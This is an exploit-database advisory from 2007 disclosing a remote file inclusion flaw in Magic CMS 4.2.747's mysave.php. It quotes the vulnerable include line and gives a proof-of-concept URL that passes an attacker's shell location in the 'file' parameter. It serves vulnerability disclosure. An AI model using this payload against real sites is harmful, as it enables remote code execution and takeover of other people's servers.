Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability

2007-03-08T00:00:00
ID 1337DAY-ID-1564
Type zdt
Reporter DNX
Modified 2007-03-08T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Magic CMS 4.2.747 (mysave.php file) Remote File Include Vulnerability
=====================================================================

                             \#'#/
                             (-.-)
   ---------------------oOO---(_)---OOo---------------------
   | Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
   |        (works only with register_globals = on)        |
   |                     coded by DNX                      |
   ---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes

[!] Background: Magic CMS is an easy to use content 
    management system based on PHP.

[!] Bug: $file in mysave.php line 3 
         
         @include($file."/myconfig.php");
         
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]

[!] Solution: Waiting for patch/update. No response from 
    vendor.



#  0day.today [2018-01-06]  #